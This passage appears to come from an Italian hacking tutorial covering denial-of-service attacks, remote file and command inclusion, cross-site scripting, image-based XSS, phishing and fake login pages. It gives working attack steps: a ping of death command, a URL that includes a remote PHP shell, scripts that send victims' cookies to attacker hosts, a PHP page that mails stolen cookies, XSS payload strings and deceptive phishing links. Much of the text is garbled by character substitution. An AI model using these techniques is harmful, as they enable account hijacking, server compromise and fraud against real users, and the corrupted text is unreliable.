/l problema del Ping Hf Death nasce dalla possibilit di creare un pacchetto /$@P B$HH superiore
del peso dei 766;8 b>tes , anche se la maggior parte dei sistemi I$P//P hanno un limite di peso
dei pacchetti .
$ome * possibile %uesto A $onoscendo la trasmissione dei pacchetti /$@P , i pacchetti vengono
divisi , inviati , e poi ricostruiti nella posizione originaria di come * stato inviato .
1ella maggior parte dei casi il sistema non fa un controllo dei pacchetti inviati , nL tantomeno di
%uando li riceve , ma solo ed esclusivamente %uando li ricostruisce . Per %uesto , %uando il
sistema deve ricostruire i pacchetti , non conoscendo i pacchetti di grandezza maggiore si
instaura un buffer overflo& nel sistema e tutto risulta bloccato .
Bcco il comando per effettuare un Ping of Death
ping <l 76628 428.;.;.4
1on * finita %ua . Bcco una buona lista di tutti i tipi di ping per potersi sbizzarrire con %uesta
tecnica .
7)N? <tSPinga !)host fino a %uando non cadeM
7)N? <aS'isolve gli indirizzi in nomi host.
7)N? <n N60-.+S/ndica il numero d volte da pingare un hostM
7)N? <lS/ndica le dimensioni dei paccheetti da inviare(/! @,[ * 766;; %uindi scrivete P/1K <l
6;;; ad es."
7)N? <fSimposta il flag per la disattivazione della frammentazione nel pacchetto.
7)N? <i durataSDurata.
7)N?<v tiposervizioSIipologia di servizio.
7)N?<r conteggioS'egistra route per il conteggio dei punti di passaggio.
7)N?<s conteggioSIimestamp per il conteggio dei punti di passaggio.
7)N?<3 elencohostS/nstradamento libero lungo l)elenco host.
7)N? <( elencohost S/nstradamento vincolato lungo l)elenco host.
7)N?<B timeout SIimeout in millisecondi per ogni risposta.
1essun timore , a patto che non utilizziate un =indo&s :6 . Se %ualcuno vi minaccia di
PHD , ridetegli in faccia . 1on abbiate nessuna paura , ci sono cose peggiori di un attacco
PHD .
Bon(
Iecnica arcana utilizzata soprattutto dagli script lamer di /'$ dove i sistemi operativi vulnerabili
sono sistemi =indo&s PS :6 .
,him* , non essendoci informazioni avanzate su tale argomento sorvoliamo %uesto attacco ,
anche perch* * superato da anni .
.ischio
Iecnica lamer , non funziona da pi di dieci anni . B) possibile trovare lo script negli script
/'$ lamer , non funzionanti o comun%ue utilizzabili su macchine preistoriche .
Teardrop
Bssendo sottoposti a %uesto attacco si rischia il bloccaggio del sistema . !)attacco viene
provocato da una frammentazione non corretta , dove lo stac- I$P//P non riesce a ricostruire il
pacchetto e provoca l)overflo& nel sistema .
/l teardrop * un attacco molto utilizzato negli script lamer /'$ , pertanto * possibile trovare un
programma per effettuare tale attacco facendo una semplice ricerca con un %ualsiasi motore di
ricerca .
.ischio
Uorse esagero , * sempre un attacco semplice , ma dalla radice del sistema sono stati
creati dei sistemi pi efficaci creati di giorno in giorno . Pertanto i sistemi non aggiornato
potrebbero essere vulnerabili , come ad esempio i vecchi sistemi =indo&R :6 o 1I .
!lic(
Sono affetti dal clic- tutti i sistemi =indo&s(3.4/:6/:9/1I/[P" !inuJ * invece immune a tale
attacco (chiss perch*" .
$lic- o meglio /$@PYDBSI/1,^/H1BY/'',KK/?1K/E/!B ha come sintomo la disconnessione dal
server /'$ con il classico messaggio di uscita(
WWW murdercode has %uit irc ($onnection reset b> peer"
1on tutti sanno per+ che %uesto attacco pu+ essere inviato non solo contro le connessioni /'$,
ma anche contro %ualsiasi connessione I$P ( i messaggi di errore del bro&ser per esempio Tla
connessione * stata reimpostataT"
/l $lic- pu+ essere generato sia da sistemi =indo&s (famoso appunto il codice di 'had del
clic-2.2" che da macchine ?nWJ e che per difendersi bisogna filtrare /$@P usando un fire&all.
,nche il 1u-enabber filtra %uesto tipo di icmp ma non ha nessuna funzione di blocco, ti pu+ solo
avvisare che in %uel momento un determinato ip ti sta attaccando.
Si consiglia comun%ue contro il clic- il connettersi a porte fuori range del server /'$ .
.ischio
$i si pu+ difendere con %ualche accorgimento , ma non tutti seguono le cure o aggiornano
il proprio soft&are , pertanto sar difficile evitare l)attacco per un principiante .
Bloop
,ttacco che consiste nell)invio di pacchetti /$@P spoofati e inviati in maniera casuale ,
provocando il crash del sistema vittima .
!)attacco pu+ essere generato dai sistemi ?nWJ e l)unico metodo per difendersi * filtrare sul
fire&all (o direttamente sul sistema operativo" i pacchetti in entrata in modo da evitare il
problema .
/ sistemi vulnerabili A 1aturalmente i sistemi =indo&s , specie le vecchie versioni :6,:9 e 1I .
.ischio
'ischio bassissimo . / Sistemi pi a rischio sono vecchi e comun%ue basta un
semplicissimo fire&all per ovviare al problema .
7ing 7attern
?na vulnerabilit presente su circa il 7;] dei modem presenti in circolazione .
$onsiste nell)inviare al modem della vittima attraverso P/1K o anche $I$P il comando ,IH;\\\
(disconnessione". /l modem alla risposta si disconnette , nulla di particolarmente grave insomma
, ma comun%ue irritante .
.ischio
,lcuni produttori ancora non si decidono a fiJare %uesto problema . / pochi che lo hanno
fatto ci hanno pensato troppo tardi # tra l)altro , non penso che facilmente %ualcuno pensi
a cambiare il proprio modem . !)unica soluzione %uindi * cambiare modem .
)?07
,lla @icroRoft , come abbiamo detto , gli piace gestire i pacchetti come gli pare e piace . Bcco
perch* %uesto attacco * producibile da sistemi ?nWJ che attaccano gli utenti =indo&R , specie
nei sistemi :6/:9/1I , in %uanto l)H.S. non riesce a gestire al meglio i pacchetti e viene fuori
l)odiosa schermata blu . uindi un semplice invio di un pacchetto /K@P su un sistema =indo&R
non patchato si provoca l)overflo& del sistema.
.ischio
?n fire&all va pi che bene , ma conosco delle persone che non possono permettersi le
nuove tecnologie e si tengono da parte alle chat /'$ per essere al sicuro da %uesto
attacco . ?n)altra soluzione * di usare un sistema ?nWJ .
=inNu(e < ++B
Sono affetti dall)HHE i sistemi =in 34/:6/1I .
/l =in1u-e ha come sintomo il bluescreen o il blocco del P$.
/nvia dati out of band alle porte 438/439/43: (netbios".
/l =in1u-e pu+ essere generato da macchine =indo&R o WniJ (anche senza avere i privilegi di
)root)" e per prevenirlo * sufficiente aggiornarsi alle =inSoc-2.2 anche se il sito della @icroRoft ha
rilasciato anche una semplice patch .
.ischio
$ome abbiamo detto l)attacco * inefficace se si utilizza una %ualsiasi versione di =indo&s
non patchata . B) rarissimo trovarne una , pertanto dichiariamo %uesto attacco
inutilizzabile .
Land
$ontinuiamo a parlare di attacchi scrausi (come il PHD" su macchine altrettanto arcane .
!)attacco * banalissimo , il bug altrettanto . Uorse un giorno ci verr spiegato perch* succede
%uesto .
B0 una tecnica che consiste nell0inviare un pa--etto S`1 contenente porta o /P ,ddress sbagliati
causando dun%ue un blocco nel sistema vittima.
Bcco una lista di tutte le macchina infette da %uesto attacco (
CI? # IS -ulnerable
CI? #.2 =>, -ulnerable
CI? ' =>, -ulnerable
CI? '.1 =>, -ulnerable
CI? '.2.1 =>, -ulnerable
Cmiga>S Cmi,(. '.0demo =>, -ulnerable
Cmiga>S Cmi,(. '.2 9Fic!start #.0) IS -ulnerable
Cmiga>S "iami 2.0 =>, -ulnerable
Cmiga>S "iami 2.1f =>, -ulnerable
Cmiga>S "iami 2.1) =>, -ulnerable
Cmiga>S "iami 2.82c =>, -ulnerable
3e>S .re-iew 7elease 2 .ower"ac IS -ulnerable
3S6I 2.0 IS -ulnerable
3S6I 2.1 9-anilla) IS -ulnerable
3S6I 2.1 9F210-021GF210-022GF210-02') =>, -ulnerable
3S6I #.0 =>, -ulnerable
6<4E? 7'.12 =>, -ulnerable
6igital E=I? #.2c =>, -ulnerable
6igital E=I? '.0 =>, -ulnerable
6igital +"S HHH IS -ulnerable
ree3S6 2.1./-7E%ECSE =>, -ulnerable
ree3S6 2.2.2-7E%ECSE =>, -ulnerable
ree3S6 2.2.*-7E%ECSE IS -ulnerable
ree3S6 2.2.*-S,C3%E IS -ulnerable 9fixed)
ree3S6 #.0-(E77E=, IS -ulnerable 9fixed)
B. External Iet6irect .rint Ser-ers IS -ulnerable
B.-E? 8.0# =>, -ulnerable
B.-E? 10.01 =>, -ulnerable
B.-E? 10.20 =>, -ulnerable
I3" CS4'00 >S1'00 #.1 IS -ulnerable 9100J (.E)
I7I? *.2 IS -ulnerable
I7I? *.# IS -ulnerable
I7I? /.2 =>, -ulnerable
I7I? /.# =>, -ulnerable
I7I? /.' =>, -ulnerable
%inux 1.2.1# =>, -ulnerable
%inux 2.1./* =>, -ulnerable
%inux 2.0.#0 =>, -ulnerable
%inux 2.0.#2 =>, -ulnerable
"ac>S "ac,(. IS -ulnerable
"ac>S >)en,rans)ort 1.1.1 =>, -ulnerable
"ac>S 1.1)/ =>, -ulnerable
"ac>S 1.*.1 =>, -ulnerable
"ac>S 1./.1 >)en,rans)ort 1.1.2 IS -ulnerable 9not a com)leate loc!u))
"ac>S 2.0 IS -ulnerable 9,(.4I. stac! cras5ed)
"+S >S#80 1.# =>, -ulnerable
=etC)) =S ser-er '.1d IS -ulnerable
=etC)) =S ser-er '.# IS -ulnerable
=et3S6 1.1 IS -ulnerable
=et3S6 1.2 IS -ulnerable
=et3S6 1.2a IS -ulnerable
=et3S6 1.2.1 IS -ulnerable 9fixed)
=et3S6 1.#KC%.BC IS -ulnerable 9fixed)
=e?,S,E. #.0 IS -ulnerable
=e?,S,E) #.1 IS -ulnerable
=o-ell '.11 IS -ulnerable 9100J (.E for #0 secs)
>)en3S6 2.1 9conflicting re)orts)
>)en3S6 2.2 =>, -ulnerable
>)en+"S 1.1 wit5 E(? '.1-1 IS -ulnerable
>S42 #.0 =>, -ulnerable
>S42 '.0 =>, -ulnerable
$=? '.2' IS -ulnerable
75a)sod; 6e-elo)er 7elease IS -ulnerable
S(> >)enSer-er *.0.2 S". IS -ulnerable
S(> >)enSer-er *.0.' IS -ulnerable 9!ills networ!ing)
S(> Enixware 2.1.1 IS -ulnerable
S(> Enixware 2.1.2 IS -ulnerable
Salaris 2.' =>, -ulnerable
Solaris 2.*.1 =>, -ulnerable
Solaris 2.*.2 =>, -ulnerable
Solaris 2./ =>, -ulnerable
Sun>S '.1.# IS -ulnerable
Sun>S '.1.' IS -ulnerable
Eltrix HHH =>, -ulnerable
0indows 8* 9-anilla) IS -ulnerable
0indows 8* L 0insoc! 2 L +I.E.6.E?E IS -ulnerable
0indows =, 9-anilla) IS -ulnerable
0indows =, L S.# IS -ulnerable
0indows =, L S.# L sim)tc)-fix IS -ulnerable
Some misc stuff:
#(om Cccessbuilder /004100 =>, -ulnerable
#(om %in!Switc5 1000 =>, -ulnerable
#(om >ffice(onnect *00 =>, -ulnerable
#(om Su)erStac! II Switc5 1000 IS -ulnerable
Cdtran ,SE 7ac! =>, -ulnerable
C))le %aser0riter IS -ulnerable
Cscend '000 *.0C)20 =>, -ulnerable
Cscend .i)eline *0 re- *.0Ci1/ =>, -ulnerable
Cscend .i)eline *0 re- *.0C)1# =>, -ulnerable
3a;=etwor!s "C7%I= 1000 >S 90).#.02'97) =>, -ulnerable
3in,ec 3IC=(C437I(F-?S './.1 router IS -ulnerable
(isco (lassic I>S M 10.#G earl; 10.#G 11.0G 11.1G and 11.2 IS -ulnerable
(isco I>S4100 IS -ulnerable
(isco (atal;st IS -ulnerable
6igital +,1200 IS -ulnerable
arallon =eto)ia .=''0 =>, -ulnerable
B. En-izex ,erminal IS -ulnerable
%aserIet .rinter =>, -ulnerable
%i-ingston >ffice 7outer 9IS6=) IS -ulnerable
%i-ingston ." (om>S #.#.# =>, -ulnerable
%i-ingston ." (om>S #.*b11 L #.1.2 =>, -ulnerable
%i-ingston ." (om>S #.1% =>, -ulnerable
%i-ingston ." (om>S #.1.2 =>, -ulnerable
%i-ingston Enter)rise ." #.' 2% =>, -ulnerable
%i-ingston ,14E1 >7 IS -ulnerable
"il!;wa; 3lac!5ole irewall #.0 9Sun>S) IS -ulnerable
"il!;wa; 3lac!5ole irewall #.029Sun>S) IS -ulnerable
=(6 ? ,erminalsG =(60are -#.1.0 IS -ulnerable
=(6 ? ,erminalsG =(60are -#.2.1 IS -ulnerable
=eto)ia .=''0 -2.0.1 IS -ulnerable
.roteon <,/0 =>, -ulnerable
.roteon <,/0Secure =>, -ulnerable
.roteon <,10 =>, -ulnerable
.roteon <,10Secure =>, -ulnerable
.roteon <,C" =>, -ulnerable
.roteon <,?2*0 =>, -ulnerable
.roteon 73?2*0 =>, -ulnerable
Sonix Cr)eggio =>, -ulnerable
Sonix Cr)eggio L =>, -ulnerable
Sonix Cr)eggio %ite =>, -ulnerable
.ischio
/l rischio non risiede tanto sul fatto che la maggior parte degli HS non siano vulnerabili ,
ma come per il ping of death sono vulnerabili anche sistemi diversi . @olti produttori ,
specie dei router , non controllano affatto l)efficacia del sistema di protezione . Uate
attenzione .
#,,$ .emote /ile )nclusion
$on il termine 'emote Uile /nclusion ('U/" , o ,rbitrar> Uile /nclusion , si intende la
capacit di poter includere in una pagina dinamica un file esterno in modo da
modifica la natura dell)output della pagina .
Pi semplicemente , durante la programmazione PHP si utilizza la funzione Cinclude("D
che serve a includere script esterni # in %uesto modo il programmatore , nel momento
in cui avr bisogno di uno script che verr ripetuto in pi pagine (ad esempio una connessione al
server e al database" non ci sar il bisogno di riscrivere il codice ma baster includere uno script
esterno che far il tutto .
Pratica
Passiamo subito alla pratica , visto che sulla teoria non c)* molto da spiegare . Per %uesta sezione
sar indispensabile almeno una conoscenza basilare del PHP .
Eene , armiamoci di PHP e ,pache , creiamo una nuova pagina PHP (nel nostro caso rfi.php" e
inseriamo %uesta riga di codice (
PAphp
include(RYKBIa)pagina)b"#
AO
Hra procuriamoci una shell scritta in php , io personalmente adoro la $:: ma ce ne sono molte
altre , come c4;; , r68 ecc ...
, %uesto punto uplodiamo la nostra $:: su un altro server (un hoster gratuito andr pi che
bene" # conoscendo che il file incluso deriva da una variabile passata in KBI (%uindi tramite barra
degli indirizzi" creeremo la stringa infetta con il file esterno per includere la shell (
http(//428.;.;.4/rfi.phpApaginaShttp(//miohost.hoster.com/shellc::.tJt
Se tutto andr bene vedremo la shell mostrarsi sulla nostra pagina di prova (rfi.php" , altrimenti
%ualche settaggio sul server favorir una maggiore protezione da tale attacco , ma %uesto lo
vedremo pi avanti .
1ota importante ( il remote file inclusion viene utilizzato applicando script con estensioni in
formato diverso al .php , altrimenti verr riconosciuto come uno script residente sul server
vittima .
.ischio
/l rischio per %uesto tipo di attacco * gravissimo . Iramite un 'emote Uile /nclusion *
possibile navigare nell)intero server della vittima riuscendo a modificare a piacimento
%ualsiasi tipo di dato .
Prima di scrivere un $@S consiglio a chiun%ue di imparare a evitare tale tecnica .
#,&$ .emote !ommand )nclusion
!)attacco consente di manipolare il file s>stem del server in maniera remota compiendo azioni
pur non avendo accessi root nel server . /nfatti basti pensare che %uasi tutti i portali che
utilizzano sistemi come l)invio di mail , &hois , visualizzare , modificare , eliminare ed aggiungere
cartelle (e tanto altro" utilizzano degli script esterni scritti in PHP , Perl , $/$\\ o _ava.
!)attacco si svolge spesso mediante l)invio dei dati tra i form (come abbiamo visto anche nella
S! /nVection" recuperati dalla %uer>string o dai form in metodo post .
$on la tecnica della '$/ * possibile manipolare a piacimento dati , risorse , database e il sistema
operativo stesso . Fedremo ora una lista di tutte le funzioni vulnerabili nei vari linguaggi (
797
re%uire("
include()
eval()
preg_replace() (with /e modifier)
exec()
passthru()
`` (backticks)
sstem()
popen()
7erl
open("
ssopen()
glob()
sstem()
'' (backticks)
eval()
:ava
_ava(Servlets, _SP)s"
!/!II
exec!!()
s>stem("
strcp
strcat
sprintf
vsprintf
gets
strlen
scanf
fscanf
sscanf
vscanf
vsscanf
vfscanf
realpath
getopt
getpass
streadd
strecp
strtrns
Uacciamo il solito esempio pratico ( mettiamo di voler visualizzare lo stato delle porte di un server
che utilizza un sistema di pagine scritto in Perl . !a pagina dove applicheremo la '$/ sar test.pl .
Eene , andiamo sull)indirizzo della pagina Perl inviando dei dati in %uest>string (o KBI , come
volete voi" .
http(//nomesito.com/test.pl#netstat]2;<a
Fediamo attentamente il funzionamento della stringa
# serve per dire al Perl che verranno inviate delle funzioni
netstat * il comando che viene utilizzato per vedere lo stato della rete
]2; * lo spazio
<a * un parametro
Eene , dopo essere riusciti anche a manipolare gli script .pl con un semplice netstat ci baster
studiare %ualche semplice funzione in grado di fare %uello che vogliamo .
.ischio
Bseguire dei comandi in un server * gravissimo . Easta una %uer> per sputtanare tutta la
difesa di un server . B) richiesta una buona conoscenza del linguaggio di programmazione
, specie nell)argomento sulle funzioni predefinite delle stringhe per sistemare %ualche
piccolo accorgimento .
#,1$ J"" K !ross "ite "cripting
!a tecnica del $ross Site Scripting ([SS , da non confondere con $SS , un linguaggio di
programmazione mar-up dedicata al &eb" fa parte della famiglia dei Ccode inVectionD e pu+
essere attuata su %ualsiasi piattaforma che offre un servizio http , su un sito sia statico che
dinamico , anche se * pi CattuabileD su sistemi come forum , blog e .
!a possibilit di iniettare codice Vavascript nel nostro bro&ser favorisce notevoli vantaggi per il
H/$ , tra cui la possibilit di effettuare $oo-ie Krabbing e %uindi $oo-ie @anipulation (,ttacco nc5
in %uesta sezione" .
@a torniamo al generale ( come * strutturata una pagina sensibile all)attacco [SS A
HI@! < _,F,S$'/PI
PhtmlO
PheadO
Pscript languageSTVavascriptTO
function recupera("
d
var stringaSprompt(T/nserisci %ualcosa da visualizzare nel tuo
bro&serT"#
document.&rite(stringa"#
e
P/scriptO
P/headO
Pbod> on!oadSTrecupera("TO
P/bod>O
P/htmlO
$osa fa %uesta pagina A Fi chieder , tramite la funzione prompt(" , di inserire una %ualun%ue
stringa che verr poi stampata nella pagina che visualizzerete una volta arrivati alla funzione
document.&rite(" .
Uacciamo la prova di scrivere nel prompt C$iao sono @urdercodeD # nella pagina verr stampato
C$iao sono @urdercodeD M Eeh , come dovrebbe essere ... ma se scrivessimo
CPscriptOalert(C[SSD"#P/scriptOD A Ferr eseguito lo script Vavascript che mostrer un alert con
scritto C[SSD .
Hra mettiamo per assurdo che in un forum abbiamo la possibilit di inserire un post che permette
l)inserimento di codice HI@! e _avascript in una pagina (dev)essere una situazione proprio
assurda M" . Fediamo in pratica come funziona tale argomento (
Pscript languageSTVavascriptTO
document.location.hrefSThttp(//infernet.com/evilYscript.phpAcoo-ieST\document.coo-ie#
P/scriptO
Eeh , gi che ci siamo facciamo anche una mini<lesson sul coo-ie grabbing .
Dun%ue , con lo script precedente siamo riusciti a fare del $ross Site Scripting nel sito vittima ,
ora A Hra recuperiamo i valori M Bhehe , difatti lo script
document.location.hrefSThttp(//infernet.com/evilYscript.phpAcoo-ieST\document.coo-ie# andr a
recuperare i coo-ie della vittima e li invier come parametri in modalit KBI alla nostra pagina
evilYscript.php . , %uesto punto recuperiamo tali valori e , una volta ottenuti i coo-ie della vittima
, ci basta recuperarli programmando una %ualun%ue pagina . Fediamo come fare con uno script
sia in ,SP che in PHP (
PHP
Rcoo-ieSRYKBIa)coo-ie)b#
,SP
coo-ieS'e%uest.uer>string(Ccoo-ieD"
$osa contiene un coo-ie A Eeh , dipende da come sono stati creati ... di solito viene visualizzato
l)hash della pass&ord che va a eseguire una %uer> di select tipo %uesta (
SB!B$I id,hash U'H@ utenti =HB'B pass&ordSda:9fdsf9:ae8423Vh-ad23s-di9e832 and idS6
Eene , detto %uesto possiamo anche decidere di crac-are un hash presente nel coo-ie . Di solito
il tipo di hash utilizzato * l)@D6 , %uesto perch* * gi implementato nelle librerie di PHP anche se
dovrebbero decidersi a cambiarlo con %ualche sistema pi potente (tipo PK!" , ma forse
bisogner aspettare che inventino un $@S con %ueste caratteristiche prima di vederne ancora in
circolazione , %uesto deriva dal fatto che un hash md6 con una combinazione di pass&ord
semplici * crac-abile in pochissimo tempo (specie si hanno sotto mano delle buone rainbo&
tables , ma ne parleremo pi avanti nella zona crac-ing" .
Hvviamente nessuno vieta a lin-are un sito contenente uno script in grado di portare il bro&ser in
crash , magari utilizzando uno script denominato Cciclo infinitoD . Fediamo un esempio di Crottura
di scatoleD a un vostro amico (
http(//&&&.infernet<J.it/paginaYcattiva.phpAricercaSPscriptO&hile(true"dalert(T[SST"#eP/scriptO
$osG facendo verr eseguito all)infinito un alerto con scritto C[SSD , cosG facendo sar necessario
uccidere l)operazione dal tas- manager .
Bcco infine una serie di stringhe che possono essere dei validi esempio di [SS (
aKBIb http:77666)xxx)com7virusSearch)php8$N:LscriptMalert(HNSSH)L7scriptM
aKBIb http:77666)xxx))com7search7images7vie68p:O.<scriptO.!alert(HNSSH)O.<7scriptO.!
aKBIb http:77666)xxx)com7search8tBpeAindex:PMLscriptMalert(HNSSH)L7scriptMLxO*;B:P
aKBIb https:77666)xxx)com7logonfailed)htm8AAMLscriptMalert(HNSSH)L7scriptML4AA
aKBIb http:77666)xxx)com7vie6cvs)cgi7LscriptMalert(HNSSH)L7scriptM
aKBIb http:77666)xxx)com7register)php8id:'cl"evQit9re-uired:19
LastName:9!mail%ddress:PMLscriptMalert(document)cookie)L7scriptMLxO*;B:P9<ompanB:
9su5mit)x:+;
aKBIb http:77666)xxx)com7securitBfocus7SearchServlet8col:P@alert(document)cookie)@77
aPHSIb Lform name:PfP action:Phttp:77666)xxx)com7staticRsuchenP method:PpostPMLinput
name:search
value:HLscriptMalert(document)cookie)L7scriptMHML7formMLscriptMf)su5mit()L7scriptM
aKBIbhttp:77search)dooBoo)de7search7products7LimgO*;src:Iavascript:alert(document)cookie)
M
aKBIb http:77666)xxx)com7test)php8in:L5odBO*;OnLoad:alert(HNSSH)M
aKBIb http:77666)xxx)com7test)php8in:Lta5leO5ackground:PIavascript:alert(HNSSH)PM
aKBIb http:77666)xxx)com7test)php8in:L%O*;H#!=:Phttp:77goooooggle)com7PM<licca -ui L7%M
.ischio
/n se non c)* nessuna minaccia . !)attacco si verifica %uando il pollo di turno vedr rubarsi
i propri coo-ie (o altro" e se ne accorger solamento %uando vedr alterati alcuni dati (o
con una semplice lettura dei file di log" .
#,4$ )mage J"" )n3ection
nternet * il pi grande e potente mezzo d)informazione mondiale . 1el corso degli anni sono stati
scritti , elaborati e perfezionati numerosi tipi di $@S proprio per dare la possibilit a chiun%ue nel
mondo di esprimere la propria opinione su un concetto , su un argomento in %ualun%ue luogo e
situazione .
?na delle caratteristiche pi importanti di un $@S * la possibilit di dare una rappresentazione ,
un)immagine , un concetto della propria persona agli altri utilizzando l)avatar .
!a possibilit di poter inserire su un sito esterno un file (che esso sia .Vpeg o .png non fa
differenza" porta chi offre il servizio un rischio non indifferente .
La Teoria
Supponiamo che eseguendo l)upload di un)immagine contenente del codice Vavascript %uesto
possa essere eseguito dalla macchina che ospita tale servizio # un)occasione allettante , non
trovate A
Bbbene , tale concetto * stato sperimentato pi volte su diversi portali , come ad esempio phpEE
, /nvision Po&er Eoard , PunEE , PHP<1u-e e altri , innumerevoli e infiniti $@S , che offrono la
possibilit di poter uploadare una %ualsiasi immagine dentro il proprio server .
Iale concetto * applicabile solo se la vittima di turno * un utente /nternet BJplorer # perch*
%uesto A Perch* durante la lettura dell)immagine , solo /nternet BJplorer potr decifrare gli
header contenuti che offrono la possibilit all)attac-er di far eseguire il codice _avascript , mentre
gli altri bro&ser , come ad esempio Hpera , Safari e @ozilla UirefoJ , non ne permettono
l)esecuzione .
La 7ratica
!a preparazione all)attacco * solo la punta dell)iceberg ed * %uello che andr+ a mostrarvi # il resto
verr dalla vostra capacit di saper illudere la vittima in %uestione .
$ome prima punto dobbiamo procurarci i favolosi header che andremo ad inserire (
fJ9:fJ6;fJ5BfJ58fJ;DfJ;,fJ4,fJ;,fJ;;fJ;;fJ;;fJ;DPH$NfJ;;fJ;;fJ;;fJ;4fJ;;fJ;;fJ;;fJ;4
Dove (
fJ9:fJ6;fJ5BfJ58fJ;DfJ;,fJ4,fJ;, g Uirma g 9 b>tes
fJ;;fJ;;fJ;;fJ;D g $hun-size g 5 b>tes
PH$N g $hun-id g 5 b>tes
fJ;;fJ;;fJ;;fJ;4f < !arghezza g 5 b>tes
fJ;;fJ;;fJ;;fJ;4f < ,ltezza g 5 b>tes
@olto bene , ora ci baster creare e modificare la nostra immagine .png contenente gli header (
R echo <en
CfJ9:fJ6;fJ5BfJ58fJ;DfJ;,fJ4,fJ;,fJ;;fJ;;fJ;;fJ;DPH$NfJ;;fJ;;fJ;;fJ;4fJ;;fJ;;fJ;;fJ;4D
O bug.png
Uin %ua nulla di particolarmente complesso . ?na volta creata la struttura dell)immagine non ci
rester che inserire del codice _avascript (o comun%ue un %ualsiasi codice di programmazione
=eb che gira in lato client ."
R echo <n CPscriptOlocation.href S
Chttp(//nostrosito.it/rubaYcoo-ie.phpAcoo-ieSD\document.coo-ie#P/scriptOD OO bug.png
/nfine , con il comando cp , andiamo a creare la copia della nostra immagine nella cartella in cui
siamo ora (* possibile specificare un)altra cartella sostituendo il / con il percorso della cartella
desiderata" (
R cp bug.png /
!)immagine * pronta , ora non ci resta che upparla nel $@S a nostra scelta ( %uindi logghiamoci ,
spostiamoci nella sezione dove * possibile cambiare il nostro avatar e uppiamolo direttamente
dal nostro computer (oppure da un lin- remoto" . 1E ( !in-ando un lin- remoto senza inserirlo nel
$@S i coo-ie grabbati saranno %uelli dell)host remoto e non del $@S vittima .
/nfine costruiamo la pagina rubaYcoo-ie.php in %uesto modo (
PA
mail (Cnostra.mail.itD,D$oo-ie rubatiD,RYKBIa)coo-ie)b"#
AO
uindi , una volta ottenuti i coo-ie , ci baster incollarli nel nostro plugin ,dd)n)Bdit di UirefoJ ,
refreshare , %uindi ritrovarci loggati con l)account vittima senza dover conoscere la pass&ord .
Piccola curiosit ( perch* con /nternet BJplorer funziona e con gli altri bro&ser no A Semplice (
/nternet BJplorer legge ed esegue tutto %uello che ha sotto CmanoD , al contrario della
concorrenza che esegue una serie di controlli prima di procedere . 1on * il momento di passare a
un bro&ser migliore A
PS ( un ringraziamento grande grande a Dar-YSutz che mi ha mostrato %uesta tecnica e che mi
ha aiutato a segnalarlo ad alcuni popolatissimi forum e siti /taliani e non . ?n grazie di tutto cuore
.
.ischio
Stessa cosa per la $ross Site Scripting , con l)eccezione che , una volta iniettata
l)immagine contenente la [SS , sar necessario rimuoverla . /l rischio * comun%ue
bilanciato proprio per il fatto che la vittima dovr utilizzare /nternet BJplorer .
#,'$ 7hishing
$ome in molte tecniche , Chac-erD o non , circa il :;] della riuscita dell)attacco * %uello di
illudere la vittima , facendole fare tutte %uelle cose che fa tutti i giorni sotto i vostri occhi .
uanti di voi ogni giorno controlla la propria casella mail A Ianti immagino .
!a tecnica del Phishing , che sta entrando sempre pi di moda in %uesti ultimi anni , consiste di
riuscire a estrapolare informazioni a un utente vittima mediante la tecnica dell)/ngegneria Sociale
(vedi ,ttacco nc 4" .
@entre per il Social Bngineer c)* un lavoro dietro che pu+ durare anche %ualche mese , il Phishing
* un attacco alla cieca , non mira a un singolo soggetto , ma si cerca di riuscire a recuperare pi
dati possibili alle vittime di turno .
uesta tecnica viene appoggiata non solo dalla fa-e mail , ma anche da un altro stile di
estrapolazione dati dal nome di /a(e Login (vedi capitolo successivo" .
Solitamente nel phisher (colui che compie l)azione di phishing" non c)* un obiettivo personale ,
come impossessarsi dei dati di accesso del proprio sito , ma semplicemente c)* uno scopo di
lucro dietro , dove carte di credito e codici bancari sono l)obiettivo principale dell)attac-er di
turno .
uali sono le fasi del Phishing A
4"Fiene preso in considerazione un range di vittime a cui viene inviata una fa-e mail , utilizzando
un linguaggio curato e professionale , grafica che rispecchia la societ da falsificare e una buona
dose di fortuna .
2"!a mail conterr di solito delle specifiche su problemi e errori di server , dando la possibilit
all)utente vittima di riottenere la possibilit di usufruire del servizio mediante un lin- di
riattivazione .
3"/l lin- di riattivazione , naturalmente fittizio , conterr una pagina creata dall)attac-er dove si
dovranno inserire i dati personali della vittima di turno .
5"!)attac-er , una volta ricevuti i dati inseriti dalla vittima , li utilizzer per ac%uistare beni o per
trasferire somme di denaro , oppure verr utilizzato per fare da ponte agli altri trasferimenti .
Hvviamente sorge un problemone ( clic-ando sul lin- ovviamente %ualcuno si accorger che
%uello non * il server di appartenenza . Bcco che andiamo %uindi a vedere due tipi di script di
phishing (creati da me" rispettivamente per UirefoJ 2.; e /nternet BJplorer 8 ,
/irefoE &.F
Pscript languageSTVavascriptTO
function phishing4("
d
&indo&.open(Thttp(//sitochetifrega.itT"
e
P/scriptO
Pdiv on$lic-STphishing4("TO
Pa hrefSThttp(//sitoinnocente.itTO$licca %ui MP/aO
P/divO
)nternet -Eplorer D
PhtmlO

PheadO

Pscript languageST_avaScriptTO
function phishing("
d
location.href S Thttp(//fa-esite.comT#
e
P/scriptO

Pst>le t>peSTteJt/cssTO
.phishinglin- d
color( Q;;;;UU#
teJt<decoration( underline#
cursor( hand#
e
P/st>leO


P/headO
Pbod>O
Pspan classSTphishinglin-T on@ouseHverST&indo&.statusS)http(//truesite.com)T
on$lic-STphishing("TOPhishing $lic-P/spanO
P/bod>O
P/htmlO
.ischio
/ Phiser si stanno perfezionando , con nuovi script e con la continua ignoranza delle
persone . Dietro c)* un grandissimo business , sar %uasi impossibile fermare %uesto
scempio .
/a(e Login
Per un buon Ua-e !ogin le basi dell)HI@! e di un linguaggio di programmazione &eb dinamico
(PHP , ,SP , Perl , _SP o altri non fanno differenza" sono essenziali per comprendere e produrre al
meglio la struttura grafica di un sito &eb e di modificarla a proprio piacimento .
?n Ua-e !ogin viene interpretato come una riproduzione perfetta di un sito &eb , modificato nel
proprio codice per far si che la vittima di turno , una volta inserite le sue credenziali , andr a
inviare i propri dati in chiss %uale continente sperduto della Ierra .
Struttura di un =ake Login
1S &assaggio : &agina =ake Login ovviamente finta
@ettiamo caso di voler grabbare i dati di un utente @S1 . 1iente di pi facile ( andiamo su
hotmail.com , clic-iamo su Uile <O Salva pagina con nome e salviamo il tutto dentro una cartella .
,vremo ora due una pagina e una cartella dove sono contenute tutte le immagini relative alla
pagina fa-e .
!)unica cosa che dovremmo cambiare di %uesta pagina (da aprire con un editor di testo" sar
